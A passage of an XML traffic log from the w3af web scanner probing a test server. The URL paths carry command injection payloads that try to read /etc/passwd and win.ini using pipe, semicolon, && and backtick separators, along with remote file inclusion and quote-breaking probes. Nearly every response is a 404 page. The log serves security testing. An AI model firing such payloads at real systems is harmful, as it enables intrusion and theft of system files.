                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="267">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="267">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="268">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="268">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about /bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="269">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="269">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="270">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="271">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="271">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="273">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="273">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="274">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="274">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="275">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="275">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="276">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="276">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="277">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="277">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="278">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="278">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="279">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="279">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60/bin/cat+/etc/passwd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60/bin/cat+/etc/passwd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="285">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/g70HkPDQ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="285">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about g70HkPDQ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='g70HkPDQ'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="287">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="287">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="309">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="309">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="311">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="311">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%27b%22c%27d%22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%27b%22c%27d%22'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="312">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="312">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="314">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="314">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="315">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="315">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="318">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="318">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="324">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="324">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="326">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="326">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
